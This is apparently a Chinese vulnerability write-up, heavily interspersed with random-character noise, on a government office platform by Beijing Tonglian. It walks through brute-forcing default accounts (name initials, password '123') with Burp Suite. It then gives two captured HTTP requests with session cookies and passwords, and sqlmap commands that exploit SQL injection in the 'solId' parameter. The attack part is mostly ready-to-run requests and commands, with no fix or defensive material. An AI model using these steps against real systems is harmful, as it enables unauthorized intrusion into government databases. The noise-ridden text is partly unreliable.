' _# U' U& t+ z: I% A
9 c9 A0 r' M$ N& I
* x' z. W4 D, ?8 V! ], l0 @6 [; n0 t' s/ ~+ U$ s
平台简介:6 l3 t# ~+ H/ \8 [# V; c3 d
5 Z1 m: f1 i# v
3 Q) Y- r/ k3 V# b& R
1 L5 ~. v+ G/ s8 {4 }) H* k) N ! H- j& C0 v) z* H! ?
* r* w) U% C0 F 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 * C( w% R& F$ P9 g2 G
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
) t# W9 E6 L2 S* r' @0 g( t7 U同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!5 Q$ n0 Q* E8 m
3 {7 \2 k! w" ~+ J
2 V3 E( e$ A8 T( N5 Y8 i
9 p n' V- t# Q / w2 G$ c# t) H
9 p, @8 V. Q$ S$ H
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
% m; W) J+ f# P7 L: _9 q/ B& x* T8 G
; A/ C# X, d; {/ F8 c
) | K7 e5 q# ]8 i, z. Z9 h( _8 t8 x
5 M7 w$ H. g: A! g. @' a 0 [0 r0 [. X- D* j3 f, S( j0 @- T
$ q9 M. C$ o. m; n2 H* A http://1.1.1.1:7197/cap-aco/#(案例2-)
; y+ `1 c5 S: ]
) q, v% e- x6 v* J" n ~( {6 A1 z5 K" E- K: ]' m. K
http://www.XXOO.com (案例1-官网网站)4 j# \; G4 N% b! W. q$ W D9 `& f
9 V' v% C6 W) {
# g$ S0 d. J' W! b8 w9 Q
/ T+ I6 a% H+ k) D7 k" k! s3 ^. C 3 R! ]+ ]. `4 x, Z; k3 M
; {1 E# X0 d$ f$ o& v) M. }( b: ]( h1 j 漏洞详情:
M1 I) I* T* l" P. h9 D3 X. ?' y
& F$ v1 a6 D: u0 G, Z9 B7 C2 U* {4 b3 F* y
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
2 e! w* W% _; l) T
- \( b4 u: F2 m; }# U6 y7 E9 p4 `" D9 G
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:% b C& b' A. _% p! s, {3 u
0 F8 w: N( D/ i, k1 u* Q! f4 t1 v! w. Q
0 M" P* i0 c1 V; }
+ B$ J' |- q/ R) H- ~. }. l1 Y9 [: F* F0 [6 x
! Q! `8 s0 L0 R0 E - |$ D, ^6 {( d. M$ h$ d
- c& Y U% }" j) Y status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
! o4 C+ O7 ?4 X% | 9 H7 e: A" p6 k% o6 O# v7 N5 G. h
% d3 O# j" R" s 1、案例1-官方网站+ U0 t5 n" p Z, Y; h
7 K Y& c' M! [. Y5 N
& @- U; r3 ?0 Y, L7 F5 L GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
1 W. s- k/ y- `1 b2 o
% Y3 e, X5 L/ k! K9 N
0 B1 R4 G6 S2 P4 Y- L Host: www.XXOO.com, {* z' ^# U. ? y8 t
: K4 [ l" J0 [4 _/ b/ ?. ~
- s9 q$ o2 l7 T0 r. k
Proxy-Connection: Keep-Alive
4 }% ^( s9 Y" n+ p& b# b$ F, U . s# {3 L3 J. O% ]2 X
' `/ m: j2 u/ \* k: l9 Y$ w, Q
Accept: application/json, text/javascript, */*; q=0.01 F4 ^ K9 j) Y n1 V `
0 V3 \9 B- ^$ y$ {; Y8 u" Y" I' D+ ~) {: |7 X! [8 [
Accept-Language: zh-CN% R, T b0 B# O
* D, T2 k; j3 n
1 h( A/ ?. }- b# C) u* H& \ Content-Type: application/json7 v) {4 `- b2 F
3 }3 V' w( O" R& z& h+ |
% i2 i$ z8 C1 ?! t User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko8 Q" m/ [8 p1 [9 F+ ]8 L
9 }, o+ T- F. ?
, C! S# R# h! W+ u
X-Requested-With: XMLHttpRequest. Y6 P3 b7 g" k7 T
9 B' B( P" I' n* V" \9 p9 L# r
0 L* c8 }6 r. g Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0028 x$ }+ N- m. C* Q6 r
7 n3 Y0 y) K _
]' t, |* m g. \2 p) q |3 J Accept-Encoding: gzip, deflate, sdch
0 D* \- p o# T" ^) c/ ], o5 Z q+ L/ k A5 X( S( [ z& C$ G% Q
( }" N9 p v1 C. P1 R$ @; n9 `" z A
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e% w- i1 I! }5 O* t$ U
& S- T/ Z0 P& ?! o) v
* _% i; S9 y. D 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:. m: ]) V$ {: {( @* @
4 h" j0 K( |9 i7 F3 o" q
3 l/ I6 i* T" s4 `' o6 W
9 } H% g, o' _; F: p
4 b5 ^5 t- x# n! L2 I9 g
7 o) h5 W* a+ y4 P6 E* }
7 H: D4 }; G; j3 x5 l9 Y. f! i + A: K, J. Y$ s, _5 r }
% g8 C- s! ^7 s* J) T5 u
p) u6 p$ ~9 P1 G6 k & B" ]" w }4 D
# H: b% Q7 R' u0 X5 e% |$ I9 Q' S
+ W9 i& A" d7 B6 w( v
% a0 W N' K3 Q: @7 h% E; M( I* C% j3 M5 r7 j# _
+ {# N. d6 T6 n) G# J7 f
2 j% z3 o1 Z6 J e9 f u& J! s# ^: X }# V* x9 L9 T/ U
2、案例2-某天河云平台
& w, l- ~1 ?+ ?4 ~& q
* T/ t3 I2 `9 X2 D9 w1 T( b) S( A' |
( e0 W7 i; F* I$ z) e5 M8 @ GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
! h8 [& z% L6 f" Z7 b& x& v, `6 \
# s! h8 h9 b& R4 b" q% P3 m0 w
! u1 ]: h; c: q' i% ^7 b6 Q$ S Host: 1.1.1.:71979 q) @. }3 P2 t, V2 l) b" j# ~
, t, ~# B4 I8 c4 @4 A2 s6 v7 \8 |8 \1 {1 l( o
Accept: application/json, text/javascript, */*; q=0.01% ^( V+ T4 q2 p1 ?: _' F
& Z' n% d" C" h6 H
% R' M2 A& r# C8 P7 y X-Requested-With: XMLHttpRequest2 H, c( X# @$ g2 N" D+ K6 y4 ^
( E) [1 `. U& i3 M
2 ^. X& E: }* k. S4 M User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
) X& d' a6 b# l " w# y$ u% z W8 _( g* k) }
7 H0 M( V# S; e
Content-Type: application/json
/ d* ?, C8 y# t! J5 P4 j e. D: J" G7 ?$ k+ O) q9 `3 O
1 e+ x" [0 {, q
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
9 Q1 [5 k6 w6 I) p3 }2 }+ b$ Y " C: j* K1 W9 h# L
% n M4 e* e9 g% ?2 T7 ] Accept-Language: zh-CN,zh;q=0.8
( z1 H, {4 N$ s+ f' b 3 U$ s! ?: j# ^( h! K! Z
; e5 ] [8 X/ d6 O
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
$ M! q- t( f, ?0 b
9 y- k& y% q- x1 J8 p6 |% ^9 }) h2 C: P8 K$ p" ^
Connection: close
G9 q' B* [; x( {; U* _
* ~- K+ }1 E0 A+ X6 J; W6 h0 t% u6 X! E: {8 i" C% Z) x. c+ P
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:/ d- P/ A5 E! a' L; Q
) k, c2 |" y# q# m+ k$ @; R7 s! O" @& C& I! c
v- E* g% `3 c# |+ z
+ \+ e+ J0 [; H
# h" T& K3 V/ `
l* t0 g" n9 `! |! t
|